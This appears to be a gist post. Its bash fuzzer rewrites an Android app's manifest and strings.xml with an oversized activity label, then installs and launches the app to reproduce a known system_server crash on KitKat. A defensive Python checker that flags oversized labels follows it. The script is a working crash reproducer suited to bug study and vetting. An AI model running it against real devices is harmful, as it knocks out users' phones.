Nifty Little Bash Script for Fuzzing Application AndroidManifest.xml's
#!/bin/bash
# Basic set up for an Application AndroidManifest fuzzer.
# This requires a preexisting ant-buildable application project to be set up, so get the SDK and ant 1.8.
# This file reproduces the bug mentioned here: http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
# NOTE: values from 260000 and up cause SIGSEGVs to be sent to the system_server (tested on KitKat 4.4.2).
# NOTE: you should probably monitor $(adb logcat) || (/system/bin/gdbserver) for responsiveness to the issue.
APP_PROJ_DIR="..."      # <-- PATH TO PROJ DIR
APP_PACKAGE_NAME="..."  # <-- PACKAGE NAME
APP_LAUNCH_COMP="..."   # <-- MAIN ACTIVITY NAME
ITER=0
# Label lengths to try, in characters; widen the range or the step to sweep further.
for ((sample_len=251000;sample_len<252000;sample_len+=1000))
do
    # Build a string of $sample_len 'A's; print() syntax works under both Python 2 and 3.
    FUZZ_DATA=$(python -c "print('A'*$sample_len)")
    # Rewrite the manifest; the activity label points at the app_name string resource.
    # The package attribute uses $APP_PACKAGE_NAME so that it matches the "am start" component below.
    echo '<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="'$APP_PACKAGE_NAME'"
android:versionCode="1"
android:versionName="1.0">
<application android:label="'$APP_LAUNCH_COMP'" android:icon="@drawable/ic_launcher">
<activity android:name="'$APP_LAUNCH_COMP'"
android:label="@string/app_name">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
</manifest>' > "$APP_PROJ_DIR/AndroidManifest.xml"
    # Rewrite strings.xml so that app_name carries the oversized value.
    echo '<?xml version="1.0" encoding="utf-8"?>
<resources>
<string name="app_name">'$FUZZ_DATA'</string>
</resources>' > "$APP_PROJ_DIR/res/values/strings.xml"
    #cat "$APP_PROJ_DIR/AndroidManifest.xml"
    echo "[*] {$ITER} (activity->android:label):$sample_len ~ $(wc -c < "$APP_PROJ_DIR/res/values/strings.xml")"
    cd "$APP_PROJ_DIR" || exit 1
    #ant debug install > /dev/null 2>&1
    ant debug install
    adb shell am start -n "$APP_PACKAGE_NAME/$APP_PACKAGE_NAME.$APP_LAUNCH_COMP"
    cd - > /dev/null
    ITER=$((ITER + 1))
    echo "[*] Launch app and check adb logcat!"
    sleep 60
done
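The bug this gist reproduces hinges on an android:label that resolves to an oversized string resource. As an added pre-install vetting check (not part of the gist or the linked write-up), the Python below resolves every component label in a manifest through strings.xml and flags values above a limit; MAX_LABEL_LEN and the sample manifest and resources are assumptions constructed for this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
LABEL_ATTR = "{%s}label" % ANDROID_NS
NAME_ATTR = "{%s}name" % ANDROID_NS
# Assumed limit for this example: the gist reports crashes at 260000+ characters,
# and no legitimate label comes anywhere near this.
MAX_LABEL_LEN = 1024
COMPONENT_TAGS = ("application", "activity", "service", "receiver", "provider")


def load_strings(strings_xml):
    """Map resource name -> value for every <string> in a strings.xml document."""
    root = ET.fromstring(strings_xml.encode("utf-8"))
    return {el.get("name"): (el.text or "") for el in root.iter("string")}


def resolve_label(raw, strings):
    """Follow an @string/<name> reference; literal labels are returned as-is."""
    if raw is not None and raw.startswith("@string/"):
        return strings.get(raw[len("@string/"):], "")
    return raw


def check_labels(manifest_xml, strings_xml, max_len=MAX_LABEL_LEN):
    """Return (tag, component name, raw attribute, resolved length) for each oversized label."""
    strings = load_strings(strings_xml)
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    findings = []
    for el in root.iter():
        if el.tag not in COMPONENT_TAGS:
            continue
        raw = el.get(LABEL_ATTR)
        label = resolve_label(raw, strings)
        if label is not None and len(label) > max_len:
            name = el.get(NAME_ATTR) or root.get("package")
            findings.append((el.tag, name, raw, len(label)))
    return findings


# Constructed sample: the manifest shape the gist writes, with app_name padded to 251000 chars.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.vuln.manifest">
  <application android:label="MainActivity">
    <activity android:name="MainActivity" android:label="@string/app_name"/>
  </application>
</manifest>"""
SAMPLE_STRINGS = '<resources><string name="app_name">%s</string></resources>' % ("A" * 251000)

if __name__ == "__main__":
    for tag, name, raw, length in check_labels(SAMPLE_MANIFEST, SAMPLE_STRINGS):
        print("oversized label on <%s> %s: %s resolves to %d chars" % (tag, name, raw, length))
```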